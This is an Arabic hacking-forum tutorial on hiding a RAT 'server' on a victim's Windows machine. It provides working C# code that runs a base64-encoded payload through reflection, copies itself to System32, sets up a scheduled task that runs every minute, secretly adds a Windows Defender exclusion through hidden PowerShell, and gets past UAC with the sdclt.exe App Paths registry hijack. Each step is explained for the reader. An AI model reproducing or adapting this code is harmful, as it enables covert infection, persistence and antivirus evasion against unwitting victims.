16.05.2017 Bypass Windows Defender&UAC-Scheduled Tasks


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,569
2,964
1
حياكم الله ياشباب
من فترة الاخ DR.JOHNNY طلب مني هنا
التعامل مع Embeded Resource وتقسيم البايت
انني اشرح تنفيذ عملي على موضوع اخونا علي هنا
Hallaj Bypass windows defender windows 10 forever
Add-MpPreference
شو الفائدة من الاستثناء
الاستثناء ياحبيبي بيفيدك اكثر من تشفيرتك ههه
صاير الويندوز ديفيندر وحش قلما تقدر تشفر منه
وان شفرت عد كم يوم بيجيبك ..اعتقد انه الاقوى الان ..
لذلك هنا شرح لذلك
كيف انك تحط بسورس التشفير خاصتك اكواد بتعمل لك التالي
بتثبت لك سيرفرك بالمهام المجدولة
+ بتتخطى صلاحيات الادمن او بمعنى اصح
بتعطي ملفك صلاحيات الادمن بدون اذن الضحية
+ بتنسخ لك سيرفرك وبصير بالسستم 32
انا شرحت كللل شي بالفديو بس رح حاول اشرح هنا ايضا
السورس هنا قديم ومكشوف المهم انك تفهم انه هنا لازم يكون سورس التشفير مالتك
C#:
static class Microsoft
    {
     public   static void Windows()
        {
            System.Reflection.Assembly.Load(Convert.FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQA")).EntryPoint.Invoke(null, null);
        }
    }



كلاس يحوي على ميثود جوا هذه الميثود حط سورس التشفير خاصتك مهما كان
لااحد يقول لي السورس بيكون مكشوف لان تحويل من بيس64
انت حط اي سورس تشفير بدك ياه تمام
خلصنا من قصة الان انه وين بتحط تشفيرتك ..تمام .؟؟؟
C#:
public static bool IsAdministrator()
      {
          var identity = WindowsIdentity.GetCurrent();
          var principal = new WindowsPrincipal(identity);
          return principal.IsInRole(WindowsBuiltInRole.Administrator);
      }



ميثود بتشيك ان كان البرنامج شغال بصلاحيات ادمن لو لا
ليش استخدمتها عشان اول مرة رح يشتغل بصلاحيات ادمن وامورك تمام
بس ثاني مرة وقت يشتغل بصلاحيات يوزر عادي مارح يشتغل معاك
انت مضطر لجملة if else
لتشيك ان كان البرنامج شغال ب صلاحيات ادمن لو لا
"جربت وهذا كان الحل يعني ماتتعب نفسك..لازمة الميثود" :15:
C#:
if (IsAdministrator() == true)
          {
              File.Copy(Application.ExecutablePath, @"C:\Windows\System32\check.exe");
              System.Diagnostics.Process.Start(new System.Diagnostics.ProcessStartInfo { CreateNoWindow = false, WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden, FileName = "schtasks", Arguments = "/create /sc minute /mo 1 /tn " + '"' + "Update" + '"' + " /tr " + '"' + @"C:\Windows\System32\check.exe" + '"' });
              var dir = Directory.GetCurrentDirectory();
              Process Pro = new Process();
              Pro.StartInfo.RedirectStandardInput = true;
              Pro.StartInfo.FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe";
              Pro.StartInfo.RedirectStandardError = true;
              Pro.StartInfo.UseShellExecute = false;
              Pro.StartInfo.CreateNoWindow = true;
              Pro.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
              Pro.Start();
              Pro.StandardInput.WriteLine($"Add-MpPreference -ExclusionPath {dir}");
              Microsoft.Windows();
          }
          else
          {
              Microsoft.Windows();
          }



الملف الاول ...سميته 106
ال106 ممكن تنزله بجهاز الضحية داونلودر
ممكن تحطه ريسورس او امبيديد ريسورس
ممكن تضمنه ك بايت اراي وتكتبه على الهارد "بكيفك"
انا خليته من ضمن ملفات البرنامج او اللعبه
شو بيعمل لك ال106 خلنا نفصفصه
اول الشي
C#:
if (IsAdministrator() == true)
بيشيك ان كان الملف شغال بصلاحيات الادمن لو لا
ان نعم بيكمل
C#:
File.Copy(Application.ExecutablePath, @"C:\Windows\System32\check.exe");
بينسخ نفسه بالسستم 32
C#:
System.Diagnostics.Process.Start(new System.Diagnostics.ProcessStartInfo { CreateNoWindow = false, WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden, FileName = "schtasks", Arguments = "/create /sc minute /mo 1 /tn " + '"' + "Update" + '"' + " /tr " + '"' + @"C:\Windows\System32\check.exe" + '"' });
بيعمل مهمة مجدولة لملفنا اللي صار بالسستم 32 بيتشتغل كل دقيقة
"حقوق الاخ شادي ""نابليون"" بس انا حولت الكود للسي شارب"
"فينك تثبت وين مابدك مش شرط المهام المجدولة "
C#:
var dir = Directory.GetCurrentDirectory();
              Process Pro = new Process();
              Pro.StartInfo.RedirectStandardInput = true;
              Pro.StartInfo.FileName = @"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe";
              Pro.StartInfo.RedirectStandardError = true;
              Pro.StartInfo.UseShellExecute = false;
              Pro.StartInfo.CreateNoWindow = true;
              Pro.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
              Pro.Start();
              Pro.StandardInput.WriteLine($"Add-MpPreference -ExclusionPath {dir}");
بيشغل لك الباور شيل بخفاء وبيرسل امر استثناء مجلد السستم 32 للويندوز ديفيندر

C#:
Microsoft.Windows();
وبيشغل سيرفرك "سورس التشفير مالتك اطلع فوق
واخيرا ان مااشتغل الملف بصلاحيات الادمن
وهذا اللي رح يصير في كل تشغيل غير اول مرة
C#:
else
         {
             Microsoft.Windows();
         }
بيستثني كل اللي فوق وبيروح علىelse
بينفذ اللي فيها "مارح اقول ايش فيها انت صرت لازم تعرف " :182:
الان ملف التخطي اللي رح ينفذ كل المصايب اللي بال106 :15:
C#:
RegistryKey reg = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion", true);
          reg.CreateSubKey(@"App Paths\control.exe");
          Thread.Sleep(3000);
          var dir1 = Directory.GetCurrentDirectory();
          var file = Path.Combine(dir1, "106.exe");
          RegistryKey reg3 = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe", true);
          reg3.SetValue("", file);
          Thread.Sleep(3000);
          Process.Start(@"C:\Windows\System32\sdclt.exe");

منفصفصه كمان
C#:
RegistryKey reg = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion", true);
          reg.CreateSubKey(@"App Paths\control.exe");
          Thread.Sleep(3000);
قلنا له ان reg هو ريجيستري كي بس انت ماتعرفه انا قلت لك هذا من العيلة :15:
خليته ينشئ 2 سب كي بالمسار الفوق بالريجيستري
ليش .؟ هذا هو التخطي ياحبيبي
بعدين قلت له روح نملك 3 ثواني ارتاح "مالها داعي خله يتعب" :257:
C#:
var dir1 = Directory.GetCurrentDirectory();
          var file = Path.Combine(dir1, "106.exe");
قلت له اسمع انا حاطط عندك ترى قريبي 106 بنفس المجلد احفظ هذا اوك
قال لي اوك وش تريد يعني :29:
C#:
RegistryKey reg3 = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe", true);
            reg3.SetValue("", file);
            Thread.Sleep(3000);
قلت له المسار هذا اللي صار مودجود بالريجيستري بعد ماانشات 2 سب كي
قال لي ايه قلت له انسخ لي مسارك + اسم قريبي اللي عندك 106
يعني خلي قيمة الكي اللي بالمسار هذا تساوي مسارك + اسم قرايبي 106
وقلت له روح نم 3 ثواني "هالمرة الها داعي الرجال تعب معك":15:
C#:
Process.Start(@"C:\Windows\System32\sdclt.exe");
قلت له شغلي sdclt.exe
ليش .؟
لان sdclt.exe رح يشغل لنا ملفنا 106 ورح يشتغل باسمه وبصلاحياته
النسخ للهارد وكل شي رح يكون باسمه من خلاله ..
وبذلك رح ياخذ ملفك صلاحيات الادمن
ورح تستثني المجلد اللي بيحوي على سيرفرك من الويندوز ديفيندر
ورح تحط اي سورس تشفير بدك ياه
ورح تثبت سيرفرك بجهاز الضحية
واكثر من هيك شو بدكم :15:
الموضوع قديم لهيك ممكن طريقة تخطي صلاحيات الادمن ترقعت ان فيه تحديثات للويندوز بالجهاز
الفديو والكلاس بالمرفقات
 

المرفقات

  • أعجبني
التفاعلات: Eagle_Master

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك